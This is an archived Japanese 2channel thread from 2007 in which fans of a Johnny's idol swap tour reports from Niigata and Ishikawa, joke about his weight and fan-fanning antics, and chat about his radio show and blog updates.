539 :ななしじゃにー:2007/02/19(月) 18:11:59 ID:+HDdEPt1
曲作りでもラジカセに直接吹き込みとか言ってなかった?
新しいモノ好きな癖にアナログなんだよね

540 :ななしじゃにー:2007/02/19(月) 18:23:09 ID:aR2/KPrR
せっかくのアップルが泣いてるなw

541 :ななしじゃにー:2007/02/19(月) 19:32:59 ID:SrVWX+2B
でも最近ガレージバンド使ってるって言ってなかったっけ?
記憶違いか?

新潟ニコニコだったのか
いいな
石川はあまりニコニコではなかったような

542 :ななしじゃにー:2007/02/19(月) 20:01:09 ID:Bzhfkn6I
まだ早いけど次スレは
( … ` д ´ )つ復刻版60
で。

543 :ななしじゃにー:2007/02/19(月) 20:03:58 ID:K5vAyqBp
>536
歌マネ
平安が"ステップバ〜イステップ"って歌うところ
一瞬だけど結構ウケてたw
>541
iTuneとか音楽編集はわかるんだけどって言ってたような
あとSkypeで大ちゃんとテレビ電話とかもするらしい
たぶんワードとかエクセルのような基本ソフトが使えないのかな
そんなパソコン話をしてたら前列にいた子供が欠伸をしたらしく
"今そこのお子さんおっきな欠伸してましたよ。そうだよね〜子供にもわかる話にしようねー。"
と言ってニガワラしててカバエカッタw

544 :ななしじゃにー:2007/02/19(月) 21:03:23 ID:4IjFhFQU
新潟2部のコール合戦の生声
「ご注文は?」
「お飲み物は?」
がツボった
飲んでええんかいw

545 :ななしじゃにー:2007/02/19(月) 21:19:15 ID:K5vAyqBp
「いらっしゃいませ〜」から始まって
「ありがとうございました〜」
「追加のご注文は〜」
ってエスカレートしてったよね
にしてもあの低音生声モエス

546 :ななしじゃにー:2007/02/19(月) 21:33:50 ID:I3pJqomR
>541
>石川はあまりニコニコではなかったような

自分もそれオモタ
でも悲しくなるから考えないようにしてた

547 :ななしじゃにー:2007/02/19(月) 22:12:46 ID:SB/60F0E
>544,545
そんなこと言ってたんだ
生声で叫んでるのは聞こえたけど
言葉までは良く聞こえなかったよw

548 :ななしじゃにー:2007/02/19(月) 22:24:04 ID:BkmHtzpf
>544
ちょwwwwwwwwwwwwwww
「ご注文は?」「つ〜」
「お飲み物は?」「つ〜」だったんかい、裏山

549 :ななしじゃにー:2007/02/19(月) 22:28:53 ID:8qZV/56+
新潟には前列に気に入った奴でもいたんだろ

550 :ななしじゃにー:2007/02/19(月) 22:32:23 ID:yb8GACmH
 ∧∧ コイヤァァァァ!!
(д´* )
(⊃⌒*⌒⊂)
 /__ノωヽ__)

551 :ななしじゃにー:2007/02/19(月) 22:34:10 ID:SB/60F0E
>549
つがちょっと引いちゃう兄チャンならいたぞw

新潟で生着替えの最中、上半身裸でチャップリンみたいな帽子被って
後ろ向いて立ってたのって2部だっけ?

552 :ななしじゃにー:2007/02/19(月) 22:46:08 ID:XeA5nA6X
うん2部
肩甲骨が萌えだった

553 :ななしじゃにー:2007/02/19(月) 22:48:09 ID:W2xrPild
>544,545
それを低音ヴォイスでやったのか
禿裏山だ

554 :ななしじゃにー:2007/02/20(火) 01:15:42 ID:mbAZFlsX
姐さん方に質問です
これってつ??

ttp://p.pita.st/?m=szmyrmxc


555 :ななしじゃにー:2007/02/20(火) 01:48:02 ID:I4oeEOCJ
>554
似てるね(w
でも違うような・・・

556 :ななしじゃにー:2007/02/20(火) 02:04:26 ID:LtDdMrK5
アリスクーパーのメイクだよね
いくらなんでも世代的に知ってるかなあw

557 :ななしじゃにー:2007/02/20(火) 04:34:02 ID:JtucyR/S
隣板担の友につのことアソパソマソみたいって言われたorz
そんなにポヨか?そんなにか?
泣けてくるよ(つД`)

558 :ななしじゃにー:2007/02/20(火) 06:46:24 ID:WGakIdpe
>541,546
スレイブでスコーンと滑った後じゃないのか?
前例で見てたけど辛そうな顔してたからどっか痛いのかとオモタ。

559 :ななしじゃにー:2007/02/20(火) 07:25:24 ID:tMyyuKoN
いや石川は終始ムッツリしてたよ
痛そうな顔とはまた違う
ラストの方は普通にニコニコしてたけど

560 :ななしじゃにー:2007/02/20(火) 07:26:37 ID:tMyyuKoN
上のは仙台や新潟と比べての話ね
他の地方はどうなのか知らんが

561 :ななしじゃにー:2007/02/20(火) 07:45:45 ID:FnWwmYB0
朝から大ムッツリをムッチリと読み間違いますたw

562 :ななしじゃにー:2007/02/20(火) 08:05:57 ID:y4cczrHt
そんなにムチムチなのか…
歩誌まで待てンゾ

563 :ななしじゃにー:2007/02/20(火) 09:52:52 ID:gZw2iaU4
新潟は1部登場の時顔がパーヤンだなと思った他は
お腹とか自分は気にならなかったよ
石川で上里大魔人がつの腹を撫でていたらしいのが
気になるっちゃ気になるww

564 :ななしじゃにー:2007/02/20(火) 10:07:55 ID:B/OqiYdt

それ見た
撫でられて二人で大笑いしてた

565 :ななしじゃにー:2007/02/20(火) 13:04:47 ID:szkAHrVE
虜では二十顎が、スレイブでは白シャツからチラ見えするポヨ腹が
ある意味気になって気になって仕方ない

566 :ななしじゃにー:2007/02/20(火) 13:36:16 ID:lQBx3B7c
だが、そこの二重顎も含めた表情がある意味
セクスィ-に見えてしまって困っているジヌンが通りますよw


567 :ななしじゃにー:2007/02/20(火) 13:57:10 ID:/9OJiAza
新潟1部
つの投げたサインボール3個中2個をダフ屋にとられてた
やっぱオクで売るのかな

2部後半
最前列向かって右の子のタオルで汗フキフキ
その後もずーっとそこでしゃがみこんで見つめながら歌ってるし
寝転んで触らせ放題だし禿裏山でした


568 :ななしじゃにー:2007/02/20(火) 14:13:09 ID:gZw2iaU4
>567
新潟はステージと客席間に距離があったからほとんどタッチしてなかたよ
嘘はいけませんw
つが扇げって手で要求するもんだから
他担姐さんもみんなで寝ているつを必死にうちわで扇いでて
正直スマンて思ったよ

569 :ななしじゃにー:2007/02/20(火) 14:23:11 ID:FnWwmYB0
下手側では立ったまま手であおげって感じに要求していて
かなりSだた

570 :ななしじゃにー:2007/02/20(火) 18:00:45 ID:LtDdMrK5
牛タン1部で扇いでもらってから味しめたんだなw
あの時の2部は上手〜センター最前に団扇持ち姐さんが全然いなくて
カミラタマラで団扇を探してウロウロしてるつにワロタわ


571 :ななしじゃにー:2007/02/20(火) 18:02:22 ID:5Q7fCjft
ドS萌え
しかしポテ腹マズー

572 :ななしじゃにー:2007/02/20(火) 18:57:09 ID:UblUtyUO
>カミラタマラで団扇を探してウロウロしてるつ

カ○エエw

573 :ななしじゃにー:2007/02/20(火) 20:46:53 ID:oRoML058
    ヘ⌒フ   
   (…`)ω(´) パーヤン茶ウマー
   ( つ旦と) 
   と__)__)


574 :ななしじゃにー:2007/02/20(火) 20:52:06 ID:SHp3aBKL
とりあえずネタに乗っかるよ
カバエエw

575 :ななしじゃにー:2007/02/20(火) 21:34:27 ID:Xyekqhk5
つの団扇&ポヨねたでかなり笑わせてもらいました
レポdです

576 :ななしじゃにー:2007/02/21(水) 00:11:09 ID:9OK6Ee75
283コナイ━━━━━━━━( ゚c_゚ )━━━━━━━━!!

577 :ななしじゃにー:2007/02/21(水) 00:12:35 ID:bYu1OBI7
ラジオにメールしな

578 :ななしじゃにー:2007/02/21(水) 00:15:05 ID:P/Aot9EC
や、今のつはかなりSモードに入ってるみたいだからさ
ヤレヤレ言われると逆にしなさげじゃない?
そして忘れた頃とかラジオOAとかにあわせて出し抜かれてる希ガスw

579 :ななしじゃにー:2007/02/21(水) 00:28:00 ID:OPkSSwkU
今更だがわんこ&牛タンでつのあまりのテンションの高さにおののき、
それが壊れるのが怖くて更新汁コールが出来なかったよ

580 :ななしじゃにー:2007/02/21(水) 04:47:31 ID:145T++wk
誰か最前入る姐さん電池で動くミニ扇風機持ってってよ

581 :ななしじゃにー:2007/02/21(水) 10:40:37 ID:PXYbnM4W
参加するコンはまだまだ先だけど最前列きたからやってみるよ
つ、気付くかわからんが…

582 :ななしじゃにー:2007/02/21(水) 13:55:44 ID:whNJHpD3
>581
ノリがいいと必ず気づいて寄ってきてくれるよ
姐さんマックスでダンシンすればよい、友も巻き込んで!!

583 :ななしじゃにー:2007/02/21(水) 14:09:45 ID:tMTw8rSF
パーヤンうちわ持っていくとか

しかしパーヤンっていう言い方がこんなに浸透してるとは本人知らないだろうなw

584 :ななしじゃにー:2007/02/21(水) 14:26:43 ID:145T++wk
>581
うわ!ホントにノッてくれるなんてウレスィ
是非是非結果を報告してくださいね

585 :ななしじゃにー:2007/02/21(水) 15:00:00 ID:j6HiB3S3
>583
パーヤンと自分で言ったことすら覚えてない希ガス
しかも新潟でネットはほとんどヤラネって言ってたww

586 :ななしじゃにー:2007/02/21(水) 15:18:17 ID:wevhZIyx
ヤラネつかデキ(r

587 :ななしじゃにー:2007/02/21(水) 16:09:26 ID:b2FvuWEa
(´・ω・`)

588 : ◆7t8qJ7DZFM :2007/02/21(水) 16:10:38 ID:b2FvuWEa
( ´ ・ ω ・ ` )

589 :ななしじゃにー:2007/02/21(水) 18:28:04 ID:B3Ro13Hd
オークション見てるって言ってたらしいが
どういうのを見てるんだろ?

590 :ななしじゃにー:2007/02/21(水) 21:12:01 ID:WsMzHd5S
U2のTシャシ

591 :ななしじゃにー:2007/02/21(水) 21:47:48 ID:j383Ogmm
>590 
10マイ!

592 :ななしじゃにー:2007/02/21(水) 21:57:05 ID:j383Ogmm
つが衝撃ご鑑賞らしい

593 :ななしじゃにー:2007/02/21(水) 22:15:56 ID:dQvHRF/r
行進くるか?

594 :ななしじゃにー:2007/02/21(水) 22:20:49 ID:kryREUBb
いつ行くんだろと思ってたが無事観劇できて良かった

今晩の更新は間にあわなさげじゃない?
明日ラジオ前と予測

595 :ななしじゃにー:2007/02/22(木) 00:52:51 ID:Wicmwimg
ひぇー、昨夜行ってたよ
そういえば窓のテンソンが高かった鴨試練

596 :ななしじゃにー:2007/02/22(木) 01:29:14 ID:5xi6bW7D
姐さん気が付かなかったのか?
それはセツナス

597 :ななしじゃにー:2007/02/22(木) 06:35:41 ID:DOn7lKHG
>595
つ担って本当に痛いな
昨日はカメラ入ってたから頑張ってただけなんで勘違いしないでねw

598 :ななしじゃにー:2007/02/22(木) 12:09:31 ID:MOR3dFL4
自分牛舌行ったが、顔は確かにパーヤンだった気がするが腹や腰は全然気にならなかった

599 :ななしじゃにー:2007/02/22(木) 12:29:52 ID:bamtaejN
昔のつを知らないジヌンは勝ち組


痩せつをリアルでみたことないから

600 :ななしじゃにー:2007/02/22(木) 14:38:34 ID:5yedIAXj
昔は昔でイイ!し今は大人のオトコでいいとオモ
いつも今のつが一番なことはカワランガナ

601 :ななしじゃにー:2007/02/22(木) 14:53:14 ID:pIy+vTUv
ある意味成長見守ったよw

602 :ななしじゃにー:2007/02/22(木) 15:06:33 ID:0UznuxaL
逆にキャラはどんどん若くなってる気がするw
背伸びしなくなったってことなんだろうけど、カバエエ

603 :ななしじゃにー:2007/02/22(木) 18:02:52 ID:VtH7uZRL
>598
前列近くでみたらお腹は、プヨプヨダッタ

604 :ななしじゃにー:2007/02/22(木) 18:20:35 ID:Wicmwimg
プヨ腹、来月まで遠征できないんで次に見る時が怖いW

>597
自担がアピールするのがそんなにくやしいのか?





605 :ななしじゃにー:2007/02/22(木) 18:42:56 ID:H5S/DsmL
明後日が今ツアー初参戦な自分はすでにプヨつ覚悟w

>604
ID惜しス

606 :ななしじゃにー:2007/02/22(木) 19:13:30 ID:/oJCaOwL
(…`д´)>今夜はラジオ忘れんなよ

607 :ななしじゃにー:2007/02/22(木) 20:45:20 ID:4CFnsTlF
>606
d!
素で忘れてたよあぶなー


608 :ななしじゃにー:2007/02/22(木) 23:11:49 ID:Hj5Gs/hS
横山さんよりプヨではないだろ??

609 :ななしじゃにー:2007/02/22(木) 23:58:05 ID:+o8s5TkH
( … `д´ )<手羽先食うぞ〜

610 :ななしじゃにー:2007/02/23(金) 00:02:23 ID:Kk68Zgc3
食う前に更新汁

611 :ななしじゃにー:2007/02/23(金) 00:04:37 ID:4QtEQlrw
( … ` д ´ )<食ってから更新する…かもしれない

612 :ななしじゃにー:2007/02/23(金) 00:33:35 ID:n42Znu8M
>606
むしろ忘れとけばヨカタw

613 :ななしじゃにー:2007/02/23(金) 20:00:44 ID:Qj+Anwpc
20歳の時ポリープで入院したなんて知らなかった

614 :ななしじゃにー:2007/02/23(金) 20:14:41 ID:as1AEa6Z
つがポリープで入院したの?

90 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)